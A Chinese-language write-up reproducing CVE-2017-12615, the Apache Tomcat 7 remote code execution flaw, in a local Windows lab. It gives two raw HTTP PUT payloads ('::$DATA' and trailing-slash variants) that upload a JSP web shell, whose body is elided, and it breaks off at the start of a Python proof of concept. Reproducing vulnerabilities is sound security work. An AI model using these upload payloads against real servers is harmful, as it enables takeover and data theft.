1. 漏洞信息
漏洞编号:CVE-2017-12615
漏洞名称:CVE-2017-12615-远程代码执行漏洞
影响版本:Apache Tomcat 7.0.0 - 7.0.81
漏洞描述:
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
测试平台:Windows
测试环境:Tomcat 7.0.72
2. 漏洞验证
2.1 安装Tomcat
2.2 初始化参数
修改Tomcat 7.0/conf/web.xml文件,添加readonly属性,将 readonly 初始化参数由默认值设置为 false,重启Tomcat,经过实际测试,Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,默认配置条件下不受此漏洞影响。
2.3 任意文件上传
payload1:
PUT /111.jsp::$DATA HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: JNTASS
DNT: 1
Connection: close
…jsp shell…
payload2(可攻击Tomcat 7.0.81):
思路:可以上传jSp文件(但不能解析),却不可上传jsp。 说明tomcat对jsp是做了一定处理的。那么就考虑是否可以使其处理过程中对文件名的识别存在差异性,前面的流程中 test.jsp/ 识别为非jsp文件,而后续保存文件的时候,文件名不接受/字符,故而忽略掉。
PUT /222.jsp/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: JNTASS
DNT: 1
Connection: close
…jsp shell…
3. 写入成功
4. POC参考(猎户实验室)
1 | #! -*- coding:utf-8 -*- |